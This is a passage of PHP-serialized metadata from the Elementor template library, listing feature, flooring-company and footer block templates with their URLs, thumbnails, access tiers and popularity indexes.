10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_4.png\";s:12:\"tmpl_created\";i:1520443632;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/features-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:279;s:16:\"popularity_index\";i:135;s:11:\"trend_index\";i:265;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:562;a:19:{s:4:\"tmpl\";i:547;s:2:\"id\";i:6044;s:5:\"title\";s:11:\"Features 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_5.png\";s:12:\"tmpl_created\";i:1520443643;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/features-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:280;s:16:\"popularity_index\";i:70;s:11:\"trend_index\";i:163;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:563;a:19:{s:4:\"tmpl\";i:566;s:2:\"id\";i:6212;s:5:\"title\";s:11:\"Features 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_7.png\";s:12:\"tmpl_created\";i:1520443684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/features-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:281;s:16:\"popularity_index\";i:81;s:11:\"trend_index\";i:98;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:564;a:19:{s:4:\"tmpl\";i:567;s:2:\"id\";i:6220;s:5:\"title\";s:10:\"Features 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_8.png\";s:12:\"tmpl_created\";i:1520443685;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:282;s:16:\"popularity_index\";i:88;s:11:\"trend_index\";i:189;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:565;a:19:{s:4:\"tmpl\";i:541;s:2:\"id\";i:5983;s:5:\"title\";s:10:\"Features 3\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_3.png\";s:12:\"tmpl_created\";i:1520443630;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:283;s:16:\"popularity_index\";i:231;s:11:\"trend_index\";i:351;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:566;a:19:{s:4:\"tmpl\";i:540;s:2:\"id\";i:5974;s:5:\"title\";s:10:\"Features 4\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_3.png\";s:12:\"tmpl_created\";i:1520443629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:286;s:16:\"popularity_index\";i:69;s:11:\"trend_index\";i:181;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:567;a:19:{s:4:\"tmpl\";i:516;s:2:\"id\";i:5624;s:5:\"title\";s:10:\"Features 5\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_1.png\";s:12:\"tmpl_created\";i:1520443553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:287;s:16:\"popularity_index\";i:93;s:11:\"trend_index\";i:352;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:568;a:19:{s:4:\"tmpl\";i:515;s:2:\"id\";i:5615;s:5:\"title\";s:10:\"Features 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_5.png\";s:12:\"tmpl_created\";i:1520443551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:290;s:16:\"popularity_index\";i:41;s:11:\"trend_index\";i:119;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:569;a:19:{s:4:\"tmpl\";i:539;s:2:\"id\";i:5963;s:5:\"title\";s:10:\"Features 7\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_2.png\";s:12:\"tmpl_created\";i:1520443626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:291;s:16:\"popularity_index\";i:67;s:11:\"trend_index\";i:133;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:570;a:19:{s:4:\"tmpl\";i:565;s:2:\"id\";i:6204;s:5:\"title\";s:10:\"Features 8\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_6.png\";s:12:\"tmpl_created\";i:1520443681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:292;s:16:\"popularity_index\";i:217;s:11:\"trend_index\";i:223;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:571;a:19:{s:4:\"tmpl\";i:564;s:2:\"id\";i:6196;s:5:\"title\";s:10:\"Features 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_6.png\";s:12:\"tmpl_created\";i:1520443680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:294;s:16:\"popularity_index\";i:106;s:11:\"trend_index\";i:113;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:572;a:19:{s:4:\"tmpl\";i:1033;s:2:\"id\";i:15033;s:5:\"title\";s:28:\"Flooring Company &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/08/404.png\";s:12:\"tmpl_created\";i:1597739459;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/flooring-company-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:45:\"[\"404\",\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:296;s:16:\"popularity_index\";i:655;s:11:\"trend_index\";i:671;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:573;a:19:{s:4:\"tmpl\";i:1032;s:2:\"id\";i:15042;s:5:\"title\";s:32:\"Flooring Company &#8211; Archive\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Blog.png\";s:12:\"tmpl_created\";i:1597739084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/flooring-company-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:297;s:16:\"popularity_index\";i:320;s:11:\"trend_index\";i:275;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:574;a:19:{s:4:\"tmpl\";i:1031;s:2:\"id\";i:15017;s:5:\"title\";s:31:\"Flooring Company &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Footer.png\";s:12:\"tmpl_created\";i:1597738933;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/flooring-company-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:48:\"[\"Flooring company\",\"Flooring website\",\"Footer\"]\";s:10:\"menu_order\";i:299;s:16:\"popularity_index\";i:323;s:11:\"trend_index\";i:192;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:575;a:19:{s:4:\"tmpl\";i:1030;s:2:\"id\";i:15007;s:5:\"title\";s:31:\"Flooring Company &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Header.png\";s:12:\"tmpl_created\";i:1597738896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/flooring-company-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:48:\"[\"Flooring company\",\"Flooring website\",\"Header\"]\";s:10:\"menu_order\";i:302;s:16:\"popularity_index\";i:459;s:11:\"trend_index\";i:333;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:576;a:19:{s:4:\"tmpl\";i:1029;s:2:\"id\";i:15052;s:5:\"title\";s:36:\"Flooring Company &#8211; Single post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Single.png\";s:12:\"tmpl_created\";i:1597738858;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/flooring-company-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:303;s:16:\"popularity_index\";i:392;s:11:\"trend_index\";i:226;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:577;a:19:{s:4:\"tmpl\";i:651;s:2:\"id\";i:7837;s:5:\"title\";s:9:\"footer 01\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.14.jpg\";s:12:\"tmpl_created\";i:1524582852;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:305;s:16:\"popularity_index\";i:495;s:11:\"trend_index\";i:539;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:578;a:19:{s:4:\"tmpl\";i:647;s:2:\"id\";i:7937;s:5:\"title\";s:10:\"footer 010\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.5.jpg\";s:12:\"tmpl_created\";i:1524582665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-010/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:308;s:16:\"popularity_index\";i:185;s:11:\"trend_index\";i:115;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:579;a:19:{s:4:\"tmpl\";i:646;s:2:\"id\";i:7950;s:5:\"title\";s:10:\"footer 011\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.4.jpg\";s:12:\"tmpl_created\";i:1524582631;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-011/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:310;s:16:\"popularity_index\";i:244;s:11:\"trend_index\";i:203;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:580;a:19:{s:4:\"tmpl\";i:645;s:2:\"id\";i:7959;s:5:\"title\";s:10:\"footer 012\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.3.jpg\";s:12:\"tmpl_created\";i:1524582605;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-012/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:311;s:16:\"popularity_index\";i:177;s:11:\"trend_index\";i:140;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:581;a:19:{s:4:\"tmpl\";i:644;s:2:\"id\";i:7982;s:5:\"title\";s:10:\"footer 013\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.2.jpg\";s:12:\"tmpl_created\";i:1524582468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-013/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:314;s:16:\"popularity_index\";i:209;s:11:\"trend_index\";i:212;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:582;a:19:{s:4:\"tmpl\";i:643;s:2:\"id\";i:7997;s:5:\"title\";s:10:\"footer 014\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.1.jpg\";s:12:\"tmpl_created\";i:1524582343;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-014/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:316;s:16:\"popularity_index\";i:64;s:11:\"trend_index\";i:41;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:583;a:19:{s:4:\"tmpl\";i:693;s:2:\"id\";i:9119;s:5:\"title\";s:10:\"footer 015\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/Footer_GetStarted_350.png\";s:12:\"tmpl_created\";i:1532428138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/demo/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:317;s:16:\"popularity_index\";i:240;s:11:\"trend_index\";i:154;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:584;a:19:{s:4:\"tmpl\";i:652;s:2:\"id\";i:7852;s:5:\"title\";s:9:\"footer 02\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.13.jpg\";s:12:\"tmpl_created\";i:1524582875;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:320;s:16:\"popularity_index\";i:199;s:11:\"trend_index\";i:96;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:585;a:19:{s:4:\"tmpl\";i:653;s:2:\"id\";i:7862;s:5:\"title\";s:9:\"footer 03\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.12.jpg\";s:12:\"tmpl_created\";i:1524582903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:321;s:16:\"popularity_index\";i:137;s:11:\"trend_index\";i:91;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:586;a:19:{s:4:\"tmpl\";i:654;s:2:\"id\";i:7871;s:5:\"title\";s:9:\"footer 04\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.11.jpg\";s:12:\"tmpl_created\";i:1524582927;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:323;s:16:\"popularity_index\";i:97;s:11:\"trend_index\";i:55;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:587;a:19:{s:4:\"tmpl\";i:655;s:2:\"id\";i:7884;s:5:\"title\";s:9:\"footer 05\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.10.jpg\";s:12:\"tmpl_created\";i:1524582944;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-05/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:325;s:16:\"popularity_index\";i:92;s:11:\"trend_index\";i:109;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:588;a:19:{s:4:\"tmpl\";i:656;s:2:\"id\";i:7892;s:5:\"title\";s:9:\"footer 06\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.9.jpg\";s:12:\"tmpl_created\";i:1524583015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-06/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:326;s:16:\"popularity_index\";i:132;s:11:\"trend_index\";i:146;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:589;a:19:{s:4:\"tmpl\";i:650;s:2:\"id\";i:7904;s:5:\"title\";s:9:\"footer 07\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.8.jpg\";s:12:\"tmpl_created\";i:1524582814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-07/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:328;s:16:\"popularity_index\";i:203;s:11:\"trend_index\";i:186;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:590;a:19:{s:4:\"tmpl\";i:649;s:2:\"id\";i:7917;s:5:\"title\";s:9:\"footer 08\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.7.jpg\";s:12:\"tmpl_created\";i:1524582788;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-08/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:329;s:16:\"popularity_index\";i:89;s:11:\"trend_index\";i:144;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:591;a:19:{s:4:\"tmpl\";i:648;s:2:\"id\";i:7927;s:5:\"title\";s:9:\"footer 09\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.6.jpg\";s:12:\"tmpl_created\";i:1524582691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-09/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:331;s:16:\"popularity_index\";i:178;s:11:\"trend_index\";i:100;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:592;a:19:{s:4:\"tmpl\";i:642;s:2:\"id\";i:4676;s:5:\"title\";s:8:\"Footer 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_7.png\";s:12:\"tmpl_created\";i:1522014215;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer_7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:338;s:16:\"popularity_index\";i:237;s:11:\"trend_index\";i:346;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:593;a:19:{s:4:\"tmpl\";i:637;s:2:\"id\";i:7627;s:5:\"title\";s:8:\"Footer 